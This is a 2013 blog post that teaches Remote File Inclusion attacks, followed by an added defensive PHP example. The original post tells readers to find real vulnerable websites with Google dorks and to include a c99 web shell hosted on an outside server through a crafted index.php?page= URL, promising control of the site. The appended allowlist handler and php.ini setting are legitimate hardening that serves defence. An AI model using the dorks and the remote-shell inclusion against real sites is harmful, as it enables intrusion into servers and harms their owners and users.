Saturday, January 12, 2013

Remote File Inclusion

RFI (Remote File Inclusion) is a type of vulnerability on websites.
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is an old vulnerability, so vulnerable sites are very few.
So, how do we find a vulnerable site?
We can use a Google dork.
What kind of dork can we use?
I recommend dorks like:
inurl:index.php?page=
inurl:index.php?login=
And so on.
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and a shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99, we have root access on the site.
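
The post puts the flaw down to user-supplied input used without proper validation. As an added example (not code from the original post), this is an `index.php?page=` handler in which the parameter only selects an entry from a server-side allowlist, with the unchecked pattern shown in a comment for comparison. The page names, the `pages/` directory and the `resolve_page` function are hypothetical.

```php
<?php
// Added example, not from the original post. Page names and paths are hypothetical.

// Unchecked pattern behind index.php?page= : the parameter value is handed
// straight to include, so the request decides which file gets executed.
//   include $_GET['page'];

// Hardened form: the request only picks a key. The file name always comes
// from this server-side table, never from the request itself.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    if ($requested === null) {
        $requested = 'home';              // no parameter: default page
    }
    // Reject arrays (page[]=x) and anything that is not an exact allowlist key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

$file = resolve_page($_GET['page'] ?? null);
if ($file === null || !is_file($file)) {
    http_response_code(404);
    exit('Page not found');
}
include $file;

// Defence in depth, set in php.ini rather than in code:
//   allow_url_include = Off
// With this off, include/require refuse URL wrappers such as http:// and ftp://.
```

A value such as the `c99.txt` address above is not a key in `PAGES`, so the handler answers 404 and never reaches `include`.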

If you have a problem or you need some explanations just write under this post!
